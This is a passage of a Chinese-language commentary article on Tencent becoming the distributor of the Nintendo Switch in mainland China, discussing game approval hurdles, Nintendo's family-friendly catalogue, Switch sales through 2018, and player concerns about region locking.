但在 3A 大作的引進上,Wegame 屢屢受挫,《怪物獵人:世界》搶先上架又慘遭下架,《絕地求生》至今無法過審,導致 Wegame 至今都是不溫不火,在與 Steam 的競爭上,也很快敗下陣來。

在嚴格的審批、版號面前,即便是騰訊,也束手束腳,無能為力。

比起血腥暴力的 3A 大作,任天堂的遊戲向來都以全年齡段為目標,充滿童真樂趣,比如精靈寶可夢系列,馬里奧系列,塞爾達系列,下至垂髫小兒,上至耄耋老人,都可以享受遊戲帶來的純真樂趣,這樣的遊戲特色,使得任天堂的遊戲更容易過審。

代理 Switch,騰訊可以正式涉足留有大量空白的國內主機市場,把自身強大的渠道能力和老任優秀的遊戲內容結合起來,產生奇妙的化學效果。

優勢互補,門當戶對

為什麼不自己搞一個主機出來?

技術上,這是很簡單的,以騰訊的財力物力,別說一個 Switch,就是下個世代的主機也能分分鐘搞出來,騰訊看上的,一方面是任天堂深耕多年的遊戲原創能力,另一方面,則是 Switch 擁有的廣闊海外市場。

自 2017 年 3 月發布后,Switch 的全球銷量超過了 3200 萬台(截至 2018 年 12 月),遊戲總量達到 1868 款,騰訊自身也有類似《王者榮耀》海外版——《傳說對決》這樣的遊戲上線 Switch,並取得了相當不錯的銷售成績。

傳說對決(圖片來源:遊戲截圖)

  騰訊在某些類型的遊戲上已經具備了相當成熟的自研能力,並不斷以收購、控股等方式布局泛遊戲業務,在內容上,可以和任天堂產生互補,在國內和國外的渠道合作上,也有非常多的可能,可以說,二者能夠相互利用各自在海內外的內容和渠道優勢,達成共贏。

雖然前景樂觀,但困難也是真實存在的,尤其對國內玩家來說,普遍擔心的就是騰訊代理國行 Switch 后,任天堂會不會執行鎖區政策,這與去年完美世界確認代理 Steam 中國時產生的質疑和憂慮是一樣的。

不可否認的是,從玩家層面來講,國內遊戲生態確實在變好,玩家口味更加多樣化,對遊戲性和審美性的追求也在提高,最重要的,正版意識在不斷加強,在國內屢次爆發版權輿論爭論的情況下,更多人對知識產權有了更正面更深刻的認識。

Switch 選在這個時候進入中國,也算是天時、人和齊備,至於地利好不好,也得等到真正進來之後,看遊戲的數量和過審情況,再來評判了。

但總歸,這一步是很有意義的,也是一件好事,畢竟,一個更開放、更多元、競爭激烈的遊戲環境,才能誕生更多優秀的公司和值得掏空錢包的作品。

連一向高冷傲嬌的任天堂都進入中國了,百花齊放的那一天,還會遠嗎?

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【精選推薦文章】

帶您來了解什麼是 USB CONNECTOR  ?

為什麼 USB CONNECTOR 是電子產業重要的元件?

又掌控什麼技術要點? 帶您認識其相關發展及效能

任天堂聯姻騰訊,會是一樁皆大歡喜的婚事嗎?